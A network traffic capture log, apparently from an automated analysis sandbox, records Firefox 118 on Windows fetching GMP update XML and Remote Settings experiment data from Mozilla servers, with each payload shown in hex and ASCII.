2024-07-26 18:11:02 UTC	438	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 18:11:02 GMT Content-Type: text/xml; charset=utf-8 Content-Length: 42 Rule-ID: unknown Rule-Data-Version: unknown Strict-Transport-Security: max-age=31536000; X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none' X-Proxy-Cache-Status: MISS Via: 1.1 google Cache-Control: public,max-age=90 Alt-Svc: clear Connection: close
2024-07-26 18:11:02 UTC	42	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 0a 3c 75 70 64 61 74 65 73 3e 0a 3c 2f 75 70 64 61 74 65 73 3e Data Ascii: <?xml version="1.0"?><updates></updates>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.5	64215	35.244.181.201	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:02 UTC	428	OUT	GET /update/3/GMP/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release/Windows_NT%252010.0.0.0.19045.2006%2520(x64)/default/default/update.xml HTTP/1.1 Host: aus5.mozilla.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
2024-07-26 18:11:02 UTC	744	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 18:11:02 GMT Content-Type: text/xml; charset=utf-8 Content-Length: 715 Vary: Accept-Encoding Rule-ID: unknown Rule-Data-Version: unknown Content-Signature: x5u=https://content-signature-2.cdn.mozilla.net/chains/202402/aus.content-signature.mozilla.org-2024-09-02-22-40-36.chain; p384ecdsa=e9KMN3BOE96raZmMVYo4iSE2gxr_1AP_WZxJpmNAghcucZ5G17dNLVNW8L2q2vLDAxlL9EvOLjMqq5htgtRSIGG07itoiDsKSZ0tSSA4d5Eba2dOwlAF0l6BmSGZJolW Strict-Transport-Security: max-age=31536000; X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none' X-Proxy-Cache-Status: MISS Via: 1.1 google Cache-Control: public,max-age=90 Alt-Svc: clear Connection: close
2024-07-26 18:11:02 UTC	715	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 0a 3c 75 70 64 61 74 65 73 3e 0a 20 20 20 20 3c 61 64 64 6f 6e 73 3e 0a 20 20 20 20 20 20 20 20 3c 61 64 64 6f 6e 20 69 64 3d 22 67 6d 70 2d 67 6d 70 6f 70 65 6e 68 32 36 34 22 20 55 52 4c 3d 22 68 74 74 70 3a 2f 2f 63 69 73 63 6f 62 69 6e 61 72 79 2e 6f 70 65 6e 68 32 36 34 2e 6f 72 67 2f 6f 70 65 6e 68 32 36 34 2d 77 69 6e 36 34 2d 33 31 63 34 64 32 65 34 61 30 33 37 35 32 36 66 64 33 30 64 34 65 35 63 33 39 66 36 30 38 38 35 39 38 36 63 66 38 36 35 2e 7a 69 70 22 20 68 61 73 68 46 75 6e 63 74 69 6f 6e 3d 22 73 68 61 35 31 32 22 20 68 61 73 68 56 61 6c 75 65 3d 22 62 36 36 37 30 38 36 65 64 34 39 35 37 39 35 39 32 64 34 33 35 64 66 32 62 34 38 36 66 65 33 30 62 61 31 62 36 32 64 64 64 31 36 Data Ascii: <?xml version="1.0"?><updates> <addons> <addon id="gmp-gmpopenh264" URL="http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip" hashFunction="sha512" hashValue="b667086ed49579592d435df2b486fe30ba1b62ddd16

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.5	64214	34.149.100.209	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:02 UTC	423	OUT	GET /v1/buckets/main/collections/nimbus-desktop-experiments/changeset?_expected=1721935300722&_since=%221696422861896%22 HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/json Connection: keep-alive
2024-07-26 18:11:02 UTC	548	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 18:11:02 GMT Content-Type: application/json Content-Length: 211674 Access-Control-Allow-Origin: * Last-Modified: Fri, 26 Jul 2024 16:52:37 GMT Access-Control-Expose-Headers: Backoff, Retry-After, Alert, Content-Type, Content-Length X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 66 6c 61 67 73 22 3a 5b 22 73 74 61 72 74 75 70 22 5d 2c 22 73 69 67 6e 61 74 75 72 65 22 3a 7b 22 72 65 66 22 3a 22 73 7a 71 74 77 31 72 75 30 67 74 61 32 62 7a 69 67 68 65 7a 66 70 6f 62 31 22 2c 22 78 35 75 22 3a 22 68 74 74 70 73 3a 2f 2f 63 6f 6e 74 65 6e 74 2d 73 69 67 6e 61 74 75 72 65 2d 32 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 63 68 61 69 6e 73 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 63 6f 6e 74 65 6e 74 2d 73 69 67 6e 61 74 75 72 65 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2d 32 30 32 34 2d 30 38 2d 32 39 2d 31 33 2d 35 30 2d 35 39 2e 63 68 61 69 6e 22 2c 22 6d 6f 64 65 22 3a 22 70 33 38 34 65 63 64 73 61 22 2c 22 74 79 70 65 22 3a 22 63 6f 6e 74 65 6e 74 73 69 67 6e 61 74 75 72 65 70 Data Ascii: {"metadata":{"flags":["startup"],"signature":{"ref":"szqtw1ru0gta2bzighezfpob1","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-08-29-13-50-59.chain","mode":"p384ecdsa","type":"contentsignaturep
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: 3a 5b 7b 22 73 6c 75 67 22 3a 22 6e 65 74 77 6f 72 6b 69 6e 67 5f 70 65 72 66 6f 72 6d 61 6e 63 65 22 2c 22 70 72 69 6f 72 69 74 79 22 3a 22 70 72 69 6d 61 72 79 22 7d 2c 7b 22 73 6c 75 67 22 3a 22 70 61 67 65 5f 6c 6f 61 64 5f 70 65 72 66 6f 72 6d 61 6e 63 65 5f 6d 69 6e 69 6d 61 6c 22 2c 22 70 72 69 6f 72 69 74 79 22 3a 22 73 65 63 6f 6e 64 61 72 79 22 7d 5d 2c 22 61 72 67 75 6d 65 6e 74 73 22 3a 7b 7d 2c 22 69 73 52 6f 6c 6c 6f 75 74 22 3a 66 61 6c 73 65 2c 22 70 72 6f 62 65 53 65 74 73 22 3a 5b 5d 2c 22 73 74 61 72 74 44 61 74 65 22 3a 22 32 30 32 34 2d 30 37 2d 31 38 22 2c 22 74 61 72 67 65 74 69 6e 67 22 3a 22 28 62 72 6f 77 73 65 72 53 65 74 74 69 6e 67 73 2e 75 70 64 61 74 65 2e 63 68 61 6e 6e 65 6c 20 3d 3d 20 5c 22 72 65 6c 65 61 73 65 5c 22 29 Data Ascii: :[{"slug":"networking_performance","priority":"primary"},{"slug":"page_load_performance_minimal","priority":"secondary"}],"arguments":{},"isRollout":false,"probeSets":[],"startDate":"2024-07-18","targeting":"(browserSettings.update.channel == \"release\")
2024-07-26 18:11:02 UTC	1283	IN	Data Raw: 22 65 6e 64 44 61 74 65 22 3a 6e 75 6c 6c 2c 22 6c 6f 63 61 6c 65 73 22 3a 5b 22 65 6e 2d 47 42 22 2c 22 65 6e 2d 43 41 22 2c 22 65 6e 2d 55 53 22 5d 2c 22 62 72 61 6e 63 68 65 73 22 3a 5b 7b 22 73 6c 75 67 22 3a 22 63 6f 6e 74 72 6f 6c 22 2c 22 72 61 74 69 6f 22 3a 31 2c 22 66 65 61 74 75 72 65 22 3a 7b 22 76 61 6c 75 65 22 3a 7b 7d 2c 22 65 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 22 66 65 61 74 75 72 65 49 64 22 3a 22 74 68 69 73 2d 69 73 2d 69 6e 63 6c 75 64 65 64 2d 66 6f 72 2d 64 65 73 6b 74 6f 70 2d 70 72 65 2d 39 35 2d 73 75 70 70 6f 72 74 22 7d 2c 22 66 65 61 74 75 72 65 73 22 3a 5b 7b 22 76 61 6c 75 65 22 3a 7b 22 72 65 67 69 6f 6e 57 65 61 74 68 65 72 43 6f 6e 66 69 67 22 3a 22 55 53 2c 20 43 41 22 2c 22 77 65 61 74 68 65 72 4c 6f 63 61 74 69 Data Ascii: "endDate":null,"locales":["en-GB","en-CA","en-US"],"branches":[{"slug":"control","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pre-95-support"},"features":[{"value":{"regionWeatherConfig":"US, CA","weatherLocati
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: 65 74 29 29 20 26 26 20 28 21 28 27 62 72 6f 77 73 65 72 2e 6e 65 77 74 61 62 70 61 67 65 2e 61 63 74 69 76 69 74 79 2d 73 74 72 65 61 6d 2e 64 69 73 63 6f 76 65 72 79 73 74 72 65 61 6d 2e 74 68 75 6d 62 73 55 70 44 6f 77 6e 2e 73 65 61 72 63 68 54 6f 70 73 69 74 65 73 43 6f 6d 70 61 63 74 27 7c 70 72 65 66 65 72 65 6e 63 65 49 73 55 73 65 72 53 65 74 29 29 20 26 26 20 28 21 28 27 62 72 6f 77 73 65 72 2e 6e 65 77 74 61 62 70 61 67 65 2e 61 63 74 69 76 69 74 79 2d 73 74 72 65 61 6d 2e 6e 65 77 74 61 62 57 61 6c 6c 70 61 70 65 72 73 2e 65 6e 61 62 6c 65 64 27 7c 70 72 65 66 65 72 65 6e 63 65 49 73 55 73 65 72 53 65 74 29 29 20 26 26 20 28 21 28 27 62 72 6f 77 73 65 72 2e 6e 65 77 74 61 62 70 61 67 65 2e 61 63 74 69 76 69 74 79 2d 73 74 72 65 61 6d 2e 6e 65 Data Ascii: et)) && (!('browser.newtabpage.activity-stream.discoverystream.thumbsUpDown.searchTopsitesCompact'\|preferenceIsUserSet)) && (!('browser.newtabpage.activity-stream.newtabWallpapers.enabled'\|preferenceIsUserSet)) && (!('browser.newtabpage.activity-stream.ne
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: 61 6c 69 64 61 74 69 6f 6e 4f 70 74 4f 75 74 22 3a 66 61 6c 73 65 2c 22 69 64 22 3a 22 68 6f 6d 65 2d 61 6e 64 2d 6e 65 77 74 61 62 2d 77 65 61 74 68 65 72 2d 77 69 74 68 2d 6c 6f 63 61 74 69 6f 6e 2d 73 65 6c 65 63 74 6f 72 2d 72 65 6c 61 75 6e 63 68 22 2c 22 6c 61 73 74 5f 6d 6f 64 69 66 69 65 64 22 3a 31 37 32 31 39 33 35 33 30 30 37 32 32 7d 2c 7b 22 64 65 6c 65 74 65 64 22 3a 74 72 75 65 2c 22 69 64 22 3a 22 68 6f 6d 65 2d 61 6e 64 2d 6e 65 77 74 61 62 2d 77 65 61 74 68 65 72 2d 77 69 74 68 2d 6c 6f 63 61 74 69 6f 6e 2d 73 65 6c 65 63 74 6f 72 22 2c 22 6c 61 73 74 5f 6d 6f 64 69 66 69 65 64 22 3a 31 37 32 31 39 33 35 32 37 35 37 35 38 7d 2c 7b 22 64 65 6c 65 74 65 64 22 3a 74 72 75 65 2c 22 69 64 22 3a 22 66 65 74 63 68 70 72 69 6f 72 69 74 79 2d 65 Data Ascii: alidationOptOut":false,"id":"home-and-newtab-weather-with-location-selector-relaunch","last_modified":1721935300722},{"deleted":true,"id":"home-and-newtab-weather-with-location-selector","last_modified":1721935275758},{"deleted":true,"id":"fetchpriority-e
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: 73 2e 75 70 64 61 74 65 2e 63 68 61 6e 6e 65 6c 20 3d 3d 20 5c 22 62 65 74 61 5c 22 29 20 26 26 20 28 76 65 72 73 69 6f 6e 7c 76 65 72 73 69 6f 6e 43 6f 6d 70 61 72 65 28 27 31 34 30 2e 2a 27 29 20 3c 3d 20 30 29 20 26 26 20 28 76 65 72 73 69 6f 6e 7c 76 65 72 73 69 6f 6e 43 6f 6d 70 61 72 65 28 27 31 32 38 2e 21 27 29 20 3e 3d 20 30 29 22 2c 22 66 65 61 74 75 72 65 49 64 73 22 3a 5b 22 63 65 72 74 43 6f 6d 70 72 65 73 73 69 6f 6e 22 5d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 3a 22 66 69 72 65 66 6f 78 2d 64 65 73 6b 74 6f 70 22 2c 22 62 75 63 6b 65 74 43 6f 6e 66 69 67 22 3a 7b 22 63 6f 75 6e 74 22 3a 31 30 30 30 30 2c 22 73 74 61 72 74 22 3a 30 2c 22 74 6f 74 61 6c 22 3a 31 30 30 30 30 2c 22 6e 61 6d 65 73 70 61 63 65 22 3a 22 66 69 72 65 66 6f 78 2d Data Ascii: s.update.channel == \"beta\") && (version\|versionCompare('140.*') <= 0) && (version\|versionCompare('128.!') >= 0)","featureIds":["certCompression"],"application":"firefox-desktop","bucketConfig":{"count":10000,"start":0,"total":10000,"namespace":"firefox-
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: 6e 20 74 68 65 20 61 63 74 75 61 6c 20 6c 65 6e 67 74 68 20 61 6e 64 20 74 68 65 20 65 6e 63 6f 64 65 64 20 6c 65 6e 67 74 68 29 2e 20 49 74 20 77 69 6c 6c 20 61 6c 6c 6f 77 20 75 73 20 74 6f 20 70 72 6f 70 6f 73 65 20 74 68 65 20 62 65 73 74 20 64 65 63 6f 64 65 72 20 66 69 72 73 74 20 28 67 69 76 69 6e 67 20 69 74 20 61 20 62 69 67 67 65 72 20 63 68 61 6e 63 65 20 74 6f 20 62 65 20 73 65 6c 65 63 74 65 64 20 61 6e 64 20 75 73 65 64 29 2e 22 2c 22 66 65 61 74 75 72 65 56 61 6c 69 64 61 74 69 6f 6e 4f 70 74 4f 75 74 22 3a 66 61 6c 73 65 2c 22 69 64 22 3a 22 63 65 72 74 69 66 69 63 61 74 65 2d 63 6f 6d 70 72 65 73 73 69 6f 6e 2d 65 6e 61 62 6c 65 2d 65 78 70 65 72 69 6d 65 6e 74 2d 64 72 61 66 74 22 2c 22 6c 61 73 74 5f 6d 6f 64 69 66 69 65 64 22 3a 31 37 Data Ascii: n the actual length and the encoded length). It will allow us to propose the best decoder first (giving it a bigger chance to be selected and used).","featureValidationOptOut":false,"id":"certificate-compression-enable-experiment-draft","last_modified":17
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: 6e 64 6f 6d 69 7a 61 74 69 6f 6e 55 6e 69 74 22 3a 22 6e 6f 72 6d 61 6e 64 79 5f 69 64 22 7d 2c 22 6c 6f 63 61 6c 69 7a 61 74 69 6f 6e 73 22 3a 6e 75 6c 6c 2c 22 70 75 62 6c 69 73 68 65 64 44 61 74 65 22 3a 22 32 30 32 34 2d 30 37 2d 32 34 54 31 36 3a 34 34 3a 35 37 2e 30 39 33 35 31 31 5a 22 2c 22 73 63 68 65 6d 61 56 65 72 73 69 6f 6e 22 3a 22 31 2e 31 32 2e 30 22 2c 22 75 73 65 72 46 61 63 69 6e 67 4e 61 6d 65 22 3a 22 46 50 50 3a 20 46 6c 6f 61 74 69 6e 67 20 50 6f 69 6e 74 20 50 72 6f 74 65 63 74 69 6f 6e 20 52 6f 6c 6c 6f 75 74 20 28 4d 61 63 20 4f 6e 6c 79 29 22 2c 22 72 65 66 65 72 65 6e 63 65 42 72 61 6e 63 68 22 3a 22 63 6f 6e 74 72 6f 6c 22 2c 22 70 72 6f 70 6f 73 65 64 44 75 72 61 74 69 6f 6e 22 3a 31 30 30 2c 22 65 6e 72 6f 6c 6c 6d 65 6e 74 Data Ascii: ndomizationUnit":"normandy_id"},"localizations":null,"publishedDate":"2024-07-24T16:44:57.093511Z","schemaVersion":"1.12.0","userFacingName":"FPP: Floating Point Protection Rollout (Mac Only)","referenceBranch":"control","proposedDuration":100,"enrollment
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: 75 67 20 69 6e 20 61 63 74 69 76 65 52 6f 6c 6c 6f 75 74 73 29 20 7c 7c 20 28 28 21 28 27 64 6f 6d 2e 73 65 63 75 72 69 74 79 2e 68 74 74 70 73 5f 66 69 72 73 74 27 7c 70 72 65 66 65 72 65 6e 63 65 49 73 55 73 65 72 53 65 74 29 29 20 26 26 20 28 21 28 27 64 6f 6d 2e 73 65 63 75 72 69 74 79 2e 68 74 74 70 73 5f 66 69 72 73 74 5f 70 62 6d 27 7c 70 72 65 66 65 72 65 6e 63 65 49 73 55 73 65 72 53 65 74 29 29 20 26 26 20 28 21 28 27 64 6f 6d 2e 73 65 63 75 72 69 74 79 2e 68 74 74 70 73 5f 66 69 72 73 74 5f 73 63 68 65 6d 65 6c 65 73 73 27 7c 70 72 65 66 65 72 65 6e 63 65 49 73 55 73 65 72 53 65 74 29 29 20 26 26 20 28 21 28 27 64 6f 6d 2e 73 65 63 75 72 69 74 79 2e 68 74 74 70 73 5f 6f 6e 6c 79 5f 66 69 72 65 5f 68 74 74 70 5f 72 65 71 75 65 73 74 5f 62 61 63 Data Ascii: ug in activeRollouts) \|\| ((!('dom.security.https_first'\|preferenceIsUserSet)) && (!('dom.security.https_first_pbm'\|preferenceIsUserSet)) && (!('dom.security.https_first_schemeless'\|preferenceIsUserSet)) && (!('dom.security.https_only_fire_http_request_bac
2024-07-26 18:11:02 UTC	269	IN	Data Raw: 22 65 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 66 65 61 74 75 72 65 49 64 22 3a 22 73 68 65 6c 6c 53 65 72 76 69 63 65 22 7d 2c 7b 22 76 61 6c 75 65 22 3a 7b 22 69 64 22 3a 22 46 4f 58 5f 44 4f 4f 44 4c 45 5f 53 45 54 5f 44 45 46 41 55 4c 54 22 2c 22 67 72 6f 75 70 73 22 3a 5b 22 65 63 6f 22 5d 2c 22 63 6f 6e 74 65 6e 74 22 3a 7b 22 69 64 22 3a 22 46 4f 58 5f 44 4f 4f 44 4c 45 5f 53 45 54 5f 44 45 46 41 55 4c 54 22 2c 22 73 63 72 65 65 6e 73 22 3a 5b 7b 22 69 64 22 3a 22 46 4f 58 5f 44 4f 4f 44 4c 45 5f 53 45 54 5f 44 45 46 41 55 4c 54 5f 53 43 52 45 45 4e 22 2c 22 63 6f 6e 74 65 6e 74 22 3a 7b 22 6c 6f 67 6f 22 3a 7b 22 68 65 69 67 68 74 22 3a 22 31 32 35 70 78 22 2c 22 69 6d 61 67 65 55 52 4c 22 3a 22 63 68 72 6f 6d 65 3a 2f 2f 61 63 74 69 76 69 74 79 Data Ascii: "enabled":true,"featureId":"shellService"},{"value":{"id":"FOX_DOODLE_SET_DEFAULT","groups":["eco"],"content":{"id":"FOX_DOODLE_SET_DEFAULT","screens":[{"id":"FOX_DOODLE_SET_DEFAULT_SCREEN","content":{"logo":{"height":"125px","imageURL":"chrome://activity

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.5	64216	35.244.181.201	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:02 UTC	428	OUT	GET /update/3/GMP/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release/Windows_NT%252010.0.0.0.19045.2006%2520(x64)/default/default/update.xml HTTP/1.1 Host: aus5.mozilla.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
2024-07-26 18:11:02 UTC	744	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 18:11:02 GMT Content-Type: text/xml; charset=utf-8 Content-Length: 715 Vary: Accept-Encoding Rule-ID: unknown Rule-Data-Version: unknown Content-Signature: x5u=https://content-signature-2.cdn.mozilla.net/chains/202402/aus.content-signature.mozilla.org-2024-09-02-22-40-36.chain; p384ecdsa=kA4rXpg7s1bNutnKQuEw36vAJoQRW2GZ-GYuR3aHT7TLHEfP9-W9aJRnb7BpGQ3_A9EF1FyyAPmTnvKxmBQe-7h8keYb9XTcTXyD3arAt58LgSBIXVNFOpim3TGZMVNi Strict-Transport-Security: max-age=31536000; X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none' X-Proxy-Cache-Status: MISS Via: 1.1 google Cache-Control: public,max-age=90 Alt-Svc: clear Connection: close
2024-07-26 18:11:02 UTC	646	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 0a 3c 75 70 64 61 74 65 73 3e 0a 20 20 20 20 3c 61 64 64 6f 6e 73 3e 0a 20 20 20 20 20 20 20 20 3c 61 64 64 6f 6e 20 69 64 3d 22 67 6d 70 2d 67 6d 70 6f 70 65 6e 68 32 36 34 22 20 55 52 4c 3d 22 68 74 74 70 3a 2f 2f 63 69 73 63 6f 62 69 6e 61 72 79 2e 6f 70 65 6e 68 32 36 34 2e 6f 72 67 2f 6f 70 65 6e 68 32 36 34 2d 77 69 6e 36 34 2d 33 31 63 34 64 32 65 34 61 30 33 37 35 32 36 66 64 33 30 64 34 65 35 63 33 39 66 36 30 38 38 35 39 38 36 63 66 38 36 35 2e 7a 69 70 22 20 68 61 73 68 46 75 6e 63 74 69 6f 6e 3d 22 73 68 61 35 31 32 22 20 68 61 73 68 56 61 6c 75 65 3d 22 62 36 36 37 30 38 36 65 64 34 39 35 37 39 35 39 32 64 34 33 35 64 66 32 62 34 38 36 66 65 33 30 62 61 31 62 36 32 64 64 64 31 36 Data Ascii: <?xml version="1.0"?><updates> <addons> <addon id="gmp-gmpopenh264" URL="http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip" hashFunction="sha512" hashValue="b667086ed49579592d435df2b486fe30ba1b62ddd16
2024-07-26 18:11:02 UTC	69	IN	Data Raw: 34 37 64 22 20 73 69 7a 65 3d 22 31 34 34 38 35 38 36 32 22 20 76 65 72 73 69 6f 6e 3d 22 34 2e 31 30 2e 32 37 31 30 2e 30 22 2f 3e 0a 20 20 20 20 3c 2f 61 64 64 6f 6e 73 3e 0a 3c 2f 75 70 64 61 74 65 73 3e Data Ascii: 47d" size="14485862" version="4.10.2710.0"/> </addons></updates>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.5	64220	34.149.100.209	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:02 UTC	266	OUT	GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:02 UTC	510	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 939 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Content-Length, Backoff, Retry-After X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:27:33 GMT Age: 2609 Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:02 UTC	880	IN	Data Raw: 7b 22 70 72 6f 6a 65 63 74 5f 6e 61 6d 65 22 3a 22 52 65 6d 6f 74 65 20 53 65 74 74 69 6e 67 73 20 50 52 4f 44 22 2c 22 70 72 6f 6a 65 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 31 38 2e 31 2e 31 22 2c 22 68 74 74 70 5f 61 70 69 5f 76 65 72 73 69 6f 6e 22 3a 22 31 2e 32 32 22 2c 22 70 72 6f 6a 65 63 74 5f 64 6f 63 73 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 72 65 61 64 74 68 65 64 6f 63 73 2e 69 6f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 2f 76 31 2f 22 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 72 65 61 64 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 62 61 74 63 68 5f 6d 61 78 5f 72 65 71 75 65 73 74 73 22 3a Data Ascii: {"project_name":"Remote Settings PROD","project_version":"18.1.1","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"readonly":true,"batch_max_requests":
2024-07-26 18:11:02 UTC	59	IN	Data Raw: 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2d 73 65 74 74 69 6e 67 73 2d 61 74 74 61 63 68 6d 65 6e 74 73 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 22 7d 7d 7d Data Ascii: :"https://firefox-settings-attachments.cdn.mozilla.net/"}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.5	64223	34.149.100.209	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:02 UTC	266	OUT	GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:02 UTC	510	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 939 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Content-Length, Backoff, Retry-After X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:27:33 GMT Age: 2609 Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:02 UTC	880	IN	Data Raw: 7b 22 70 72 6f 6a 65 63 74 5f 6e 61 6d 65 22 3a 22 52 65 6d 6f 74 65 20 53 65 74 74 69 6e 67 73 20 50 52 4f 44 22 2c 22 70 72 6f 6a 65 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 31 38 2e 31 2e 31 22 2c 22 68 74 74 70 5f 61 70 69 5f 76 65 72 73 69 6f 6e 22 3a 22 31 2e 32 32 22 2c 22 70 72 6f 6a 65 63 74 5f 64 6f 63 73 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 72 65 61 64 74 68 65 64 6f 63 73 2e 69 6f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 2f 76 31 2f 22 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 72 65 61 64 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 62 61 74 63 68 5f 6d 61 78 5f 72 65 71 75 65 73 74 73 22 3a Data Ascii: {"project_name":"Remote Settings PROD","project_version":"18.1.1","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"readonly":true,"batch_max_requests":
2024-07-26 18:11:02 UTC	59	IN	Data Raw: 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2d 73 65 74 74 69 6e 67 73 2d 61 74 74 61 63 68 6d 65 6e 74 73 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 22 7d 7d 7d Data Ascii: :"https://firefox-settings-attachments.cdn.mozilla.net/"}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.5	64219	34.149.100.209	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:02 UTC	266	OUT	GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
